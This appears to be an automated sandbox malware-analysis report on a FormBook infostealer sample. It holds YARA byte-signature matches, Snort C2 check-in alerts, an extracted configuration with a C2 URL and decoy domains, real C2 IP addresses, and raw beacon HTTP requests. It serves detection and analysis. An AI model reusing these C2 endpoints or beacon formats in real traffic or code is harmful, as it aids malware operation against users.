3.2.idxgunu.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.idxgunu.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
3.0.idxgunu.exe.400000.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.idxgunu.exe.400000.5.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.0.idxgunu.exe.400000.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.idxgunu.exe.400000.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
1.2.idxgunu.exe.3100000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.idxgunu.exe.3100000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.idxgunu.exe.3100000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.idxgunu.exe.3100000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
3.2.idxgunu.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.idxgunu.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.idxgunu.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.idxgunu.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
1.2.idxgunu.exe.3100000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.idxgunu.exe.3100000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.idxgunu.exe.3100000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.idxgunu.exe.3100000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 185.53.179.174

Timestamp:	192.168.2.4185.53.179.17449700802031453 11/22/22-12:51:18.466682
SID:	2031453
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 185.53.179.174

Timestamp:	192.168.2.4185.53.179.17449700802031412 11/22/22-12:51:18.466682
SID:	2031412
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 154.205.231.195

Timestamp:	192.168.2.4154.205.231.19549697802031449 11/22/22-12:49:50.422612
SID:	2031449
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 154.205.231.195

Timestamp:	192.168.2.4154.205.231.19549697802031453 11/22/22-12:49:50.422612
SID:	2031453
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 185.53.179.174

Timestamp:	192.168.2.4185.53.179.17449700802031449 11/22/22-12:51:18.466682
SID:	2031449
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.4 - Destination IP: 154.205.231.195

Timestamp:	192.168.2.4154.205.231.19549697802031412 11/22/22-12:49:50.422612
SID:	2031412
Source Port:	49697
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected FormBook

Source: Yara match	File source: 3.0.idxgunu.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.idxgunu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.idxgunu.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.idxgunu.exe.3100000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.idxgunu.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.idxgunu.exe.3100000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.823615501.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.310662847.0000000003100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.385853163.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.823473685.0000000001040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.396843578.0000000000F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.363789719.000000000E071000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.396889564.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.823802222.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.396348614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: www.cdlcapitolsolutions.com/b31b/

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe

ReversingLabs: Detection: 17%

Machine Learning detection for sample

Source: Swift.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe

Joe Sandbox ML: detected

Source: 3.0.idxgunu.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.idxgunu.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.idxgunu.exe.3100000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 00000003.00000000.306365043.0000000000400000.00000040.80000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.cdlcapitolsolutions.com/b31b/"], "decoy": ["deltafxtrading.com", "alisonangl.com", "cdfqs.com", "easyentry.vip", "dentalinfodomain.com", "hiphoppianyc.com", "pools-62911.com", "supportteam26589.site", "delldaypa.one", "szanody.com", "diaper-basket.art", "ffscollab.com", "freediverconnect.com", "namesbrun.com", "theprimone.top", "lenzolab.com", "cikmas.com", "genyuei-no.space", "hellofstyle.com", "lamagall.com", "hallmarktb.com", "hifebou7.info", "sex5a.finance", "printrynner.com", "powerrestorationllc.com", "hirefiz.com", "uninvitedempire.com", "alpinemaintenance.online", "ppcadshub.com", "looking4.tours", "dirtyhandsmedia.com", "capishe.website", "cachorrospitbull.com", "mythic-authentication.online", "nordingcave.online", "gremep.online", "tryufabetcasino.com", "premiumciso.com", "powerful70s.com", "myminecraftrealm.com", "bssurgery.com", "steel-pcint.com", "iokailyjewelry.com", "barmanon5.pro", "kcrsw.com", "9393xx38.app", "kochen-mit-induktion.com", "indtradors.store", "giaxevn.info", "trungtambaohanhariston.com", "fulili.com", "crgabions.com", "matomekoubou.com", "duaidapduapjdp.site", "invissiblefriends.com", "cy3.space", "idqoft.com", "jamal53153.com", "lemagnetix.com", "anthroaction.com", "uspcff.top", "supplierdir.com", "counterpoint.online", "zarl.tech"]}

Source: Swift.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: idxgunu.exe, 00000001.00000003.305903076.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, idxgunu.exe, 00000001.00000003.308532987.0000000003640000.00000004.00001000.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000002.398628983.00000000013EF000.00000040.00000800.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000003.308766308.0000000000D93000.00000004.00000800.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000003.310543467.0000000000F39000.00000004.00000800.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.396614059.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.398534119.0000000004DBA000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: idxgunu.exe, idxgunu.exe, 00000003.00000002.398628983.00000000013EF000.00000040.00000800.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000003.308766308.0000000000D93000.00000004.00000800.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000003.310543467.0000000000F39000.00000004.00000800.00020000.00000000.sdmp, idxgunu.exe, 00000003.00000002.397353475.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000005.00000002.825261212.000000000506F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.396614059.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.398534119.0000000004DBA000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.824423703.0000000004F50000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: idxgunu.exe, 00000003.00000002.397197775.00000000012A0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: idxgunu.exe, 00000003.00000002.397197775.00000000012A0000.00000040.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Swift.exe	Code function: 0_2_00405E80 FindFirstFileA,FindClose,	0_2_00405E80
Source: C:\Users\user\Desktop\Swift.exe	Code function: 0_2_004054AA DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_004054AA
Source: C:\Users\user\Desktop\Swift.exe	Code function: 0_2_00402654 FindFirstFileA,	0_2_00402654

Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 4x nop then pop esi	3_2_0041732C
Source: C:\Users\user\AppData\Local\Temp\idxgunu.exe	Code function: 4x nop then pop edi	3_2_0040E47D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop esi	5_2_0105732C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	5_2_0104E47D

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.kcrsw.com
Source: C:\Windows\explorer.exe	Domain query: www.printrynner.com
Source: C:\Windows\explorer.exe	Domain query: www.giaxevn.info
Source: C:\Windows\explorer.exe	Network Connect: 199.59.243.222 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.counterpoint.online
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.174 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.205.231.195 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.221.114.43 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.hallmarktb.com
Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.duaidapduapjdp.site
Source: C:\Windows\explorer.exe	Domain query: www.barmanon5.pro
Source: C:\Windows\explorer.exe	Network Connect: 82.163.176.145 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.fulili.com

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 154.205.231.195:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 154.205.231.195:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49697 -> 154.205.231.195:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49700 -> 185.53.179.174:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49700 -> 185.53.179.174:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49700 -> 185.53.179.174:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.cdlcapitolsolutions.com/b31b/

Source: Joe Sandbox View

ASN Name: IKGUL-26484US IKGUL-26484US

Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=M+h8aLJTzkdMB+8ZocaWOvSwSZLS4MqRUOSr6JSrGf8zrqKSVky/7qT7vfhEHF4R9/H1&s2MHE=y8UpS6w HTTP/1.1Host: www.hallmarktb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=US/HGfNY9YWYLPWCTBWLA6nVcrxKwQj48xB1ut/cNKd52qSqxSuIfwmOCq9IK55e/8rl&s2MHE=y8UpS6w HTTP/1.1Host: www.kcrsw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=UH1VMjfgpJMWU+/Gn4AwdepKZevv0RxNZvKJDaH/oG1tjT2ASbSXZlDS/qU1YicJYd9A&s2MHE=y8UpS6w HTTP/1.1Host: www.counterpoint.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=t9u9o370/Gy8le3USielS0NDNQF4paptFWM7HrjD+/miGjlRMzz+Q3hrEpue/lFurnLE&s2MHE=y8UpS6w HTTP/1.1Host: www.giaxevn.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=/hsXnIl0hAYrOErJ4UuZDvWeNEd2/L3NRo6zO1KQ/oOCDpqqcfPNzkrpMSnMO3fUk1gw&s2MHE=y8UpS6w HTTP/1.1Host: www.printrynner.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=QFC5kflo2W9xiWPHk6PVZq5LNtx9PE4uciQ0+TaWAe5dGm0MZgEm/6IYv+k7jhxT2GZX&s2MHE=y8UpS6w HTTP/1.1Host: www.barmanon5.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /b31b/?lTkLp=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&s2MHE=y8UpS6w HTTP/1.1Host: www.fulili.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 22 Nov 2022 11:51:18 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Nov 2022 11:51:39 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 25 Oct 2022 21:03:40 GMTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ltgeLPpngNX%2BdhEjH4one8P0pJihrHIbCD2PqhmdnqEebNryhGjRb59n09MnI2R3gwRb4oEbLVM8i3XgAK1ucIh6gd8Q6uRsibB39EokN4QxiE0IqsN0mec5%2BXLY6km1BuK6DQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 76e17457abd09bdc-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 35 38 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f Data Ascii: 586<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-fa
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 22 Nov 2022 11:51:58 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 